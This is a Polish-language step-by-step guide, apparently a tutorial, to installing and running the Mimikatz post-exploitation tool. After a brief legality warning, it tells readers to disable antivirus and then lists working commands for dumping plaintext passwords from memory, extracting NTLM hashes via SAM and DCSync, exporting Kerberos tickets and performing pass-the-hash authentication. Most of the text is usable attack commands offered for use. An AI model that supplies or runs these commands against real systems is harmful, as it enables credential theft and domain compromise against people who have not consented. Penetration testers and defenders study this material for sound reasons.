Wprowadzenie

Mimikatz to potężne narzędzie do post-exploitation zaprojektowane do wydobywania haseł w postaci tekstu jawnego, hashy, kodów PIN i biletów Kerberos z pamięci. Jest szeroko stosowane przez testerów penetracyjnych i specjalistów ds. bezpieczeństwa do oceny podatności systemów. Ten przewodnik przedstawia krok po kroku podejście do instalacji i używania Mimikatz w etycznym testowaniu bezpieczeństwa.

Ostrzeżenie: Nieautoryzowane użycie Mimikatz jest nielegalne. Upewnij się, że masz zgodę przed użyciem go w jakimkolwiek środowisku.

Wymagania wstępne

Przed zainstalowaniem Mimikatz upewnij się, że masz:

  • Maszynę z systemem Windows (Windows 7, 10, 11 lub wersje serwerowe)
  • Uprawnienia administracyjne
  • Wyłączony Windows Defender i wszelkie oprogramowanie antywirusowe (Mimikatz często jest oznaczany jako złośliwe oprogramowanie)

Pobieranie Mimikatz

Mimikatz to narzędzie open-source dostępne na GitHubie. Aby je pobrać:

  1. Otwórz przeglądarkę internetową i przejdź do https://github.com/gentilkiwi/mimikatz.
  2. Kliknij na Code > Download ZIP.
  3. Wypakuj plik ZIP do wybranego folderu.

Alternatywnie, możesz sklonować repozytorium używając Gita:

 git clone https://github.com/gentilkiwi/mimikatz.git

Uruchamianie Mimikatz

Ponieważ Mimikatz wymaga uprawnień administracyjnych, wykonaj następujące kroki, aby go uruchomić:

  1. Otwórz Wiersz polecenia lub PowerShell jako Administrator.
  2. Przejdź do folderu, w którym wypakowałeś Mimikatz:
    cd pathtomimikatzx64
  3. Uruchom Mimikatz:
    mimikatz.exe
  4. Powinieneś zobaczyć interfejs wiersza poleceń z mimikatz # monit.

Podstawowe polecenia Mimikatz

1. Sprawdzenie uprawnień systemowych

Przed wydobyciem poświadczeń, upewnij się, że masz wystarczające uprawnienia:

privilege::debug

Jeśli się powiedzie, powinieneś zobaczyć: Privilege '20' OK

2. Wydobywanie haseł z pamięci

Aby zrzucić hasła w postaci tekstu jawnego z pamięci, użyj:

sekurlsa::logonpasswords

To wyświetli nazwę użytkownika, domenę i hasła w postaci tekstu jawnego, jeśli są dostępne.

3. Zrzucanie hashy NTLM

Hashy NTLM można używać do ataków pass-the-hash. Aby je wydobyć, uruchom:

lsadump::sam

Lub, dla systemów zdalnych:

lsadump::dcsync /domain:targetdomain.com /user:Administrator

4. Wydobywanie biletów Kerberos

Aby odzyskać bilety Kerberos z systemu:

sekurlsa::tickets /export

To eksportuje .kirbi pliki, które mogą być używane w atakach pass-the-ticket.

5. Atak Pass-the-Hash

Aby uwierzytelnić się za pomocą hasha NTLM zamiast hasła:

sekurlsa::pth /user:Administrator /domain:example.com /ntlm:<hash>